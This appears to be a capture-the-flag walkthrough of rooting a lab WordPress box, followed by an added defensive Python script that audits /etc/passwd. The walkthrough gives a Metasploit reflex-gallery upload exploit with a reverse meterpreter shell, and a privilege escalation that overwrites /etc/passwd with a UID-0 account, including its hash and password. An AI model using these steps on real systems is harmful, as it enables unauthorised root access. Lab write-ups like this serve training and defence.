We start by scanning the box with nmap -A -T4 -p- 192.168.1.10 -vv

Now we scan it with dirb http://192.168.1.10 /usr/share/dirb/wordlists/big.txt

As we can see, the box is running WordPress, so we are going to scan it with wpscan --url http://192.168.1.10/wordpress -e

Running the command again, this time enumerating plugins, gives:

One of the plugins, reflex-gallery, has a known exploit that we can use in Metasploit; searching for reflex-gallery finds it:

use exploit/unix/webapp/wp_reflexgallery_file_upload
set RHOSTS 192.168.1.10
set TARGETURI /wordpress
set payload php/meterpreter/reverse_tcp
set LHOST <your attacking IP>
exploit

Once we have a shell, cd /home/raj and cat the flag.

Next we run the LinEnum.sh script, which reports:

As we can see, we can run the cp command with elevated privileges, so we are going to copy our own passwd file to the box and replace /etc/passwd with it. By adding a user with UID 0 to that file on our machine, we can become root.

Now add the new user and its hash at the end of a copy of the passwd file in your home folder:
hacker:$1$hacker$6luIRwdGpBvXdP.GMwcZp/:0:0:root:/root:/bin/bash
Now that we have created the new user hacker, we are going to serve our passwd file to the target box using python -m SimpleHTTPServer 80:


Now just run su hacker, enter the password 123456, and you are root.
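As an added example that is not part of the walkthrough, here is a small Python audit script a defender could run against /etc/passwd to spot exactly the kind of entry added above: a second UID-0 account, a hash stored directly in /etc/passwd rather than /etc/shadow, and an obsolete md5crypt ($1$) hash. The sample passwd content is constructed for the example.

```python
import re

# Constructed sample /etc/passwd: three normal accounts plus the UID-0
# "hacker" entry that the walkthrough appends.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
raj:x:1000:1000:raj,,,:/home/raj:/bin/bash
hacker:$1$hacker$6luIRwdGpBvXdP.GMwcZp/:0:0:root:/root:/bin/bash
"""

# Password-field values meaning "hash lives in /etc/shadow" or "account locked".
SHADOWED = {"x", "*", "!", "!!", ""}
# Modular-crypt hashes start with $<id>$ ; $1$ is md5crypt, which is obsolete.
HASH_RE = re.compile(r"^\$([0-9a-z]+)\$")
WEAK_HASH_IDS = {"1"}  # md5crypt; $6$ (sha512crypt) or $y$ (yescrypt) are fine


def audit_passwd(text):
    """Return a list of (line_no, username, reasons) for entries worth a look.

    Flags: UID 0 on any account other than root, a password hash stored in
    the world-readable /etc/passwd instead of /etc/shadow, and a weak hash
    algorithm. Malformed lines are reported as well.
    """
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((line_no, fields[0], ["malformed entry: expected 7 fields"]))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        reasons = []
        if uid == "0" and name != "root":
            reasons.append("UID 0 on a non-root account")
        if pw not in SHADOWED:
            reasons.append("password hash stored in /etc/passwd (world-readable)")
            m = HASH_RE.match(pw)
            if m and m.group(1) in WEAK_HASH_IDS:
                reasons.append(f"weak hash algorithm ${m.group(1)}$ (md5crypt)")
        if reasons:
            findings.append((line_no, name, reasons))
    return findings


if __name__ == "__main__":
    for line_no, name, reasons in audit_passwd(SAMPLE_PASSWD):
        print(f"line {line_no}: {name}: " + "; ".join(reasons))
```

On a live host, read /etc/passwd and pass its contents to audit_passwd; any UID-0 account besides root or any hash in the password field deserves immediate investigation.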
